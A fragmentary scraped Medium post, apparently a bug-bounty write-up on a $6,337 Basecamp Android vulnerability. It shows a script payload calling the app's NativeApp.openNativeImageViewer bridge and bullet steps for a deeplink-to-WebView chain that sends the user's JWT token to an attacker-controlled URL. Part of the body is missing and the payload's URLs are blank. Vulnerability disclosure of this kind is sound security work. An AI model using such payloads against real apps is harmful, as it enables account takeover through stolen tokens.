Android security — $6,337 vulnerability in basecamp


The vulnerability<attacker_website>

What then?

<script>NativeApp.openNativeImageViewer("[{'download_url': '', 'preview_url': 'https:/', 'caption':'ViewImage'}]", 0)</script>
  • Send a deeplink URL to the basecamp app to open
  • The app will open the app, and open the ‘proceed_to’ url inside the WebViewActivity class
  • The WebViewActivity will render the proceed_to html (my stage 1 attack) in a special webview
  • That webview will execute the ‘openNativeImageViewer’ which opens (funny enough) a native image view
  • That image viewer goes to a URL (again controlled by me) and adds that users’s authentication (i.e. jwt) token in the header





Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium


BurnX 2.0 — Gainers Competition

India makes it to Top 10 in Global Cybersecurity Index 2020

📆Revoland Calendar📆

Request for Proposal

{UPDATE} Highway Racer Hack Free Resources Generator

Aurora FS

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Daniel Llewellyn

Daniel Llewellyn

More from Medium

A Deep dive into <iframe> src=”” attribute leading to a Stored XSS

Port scanning and service discovery in 2022 — we have failed as a humanity

Exploiting Android’s Task Hijacking

[2/3] XSS Through The Front-Door @ GitLab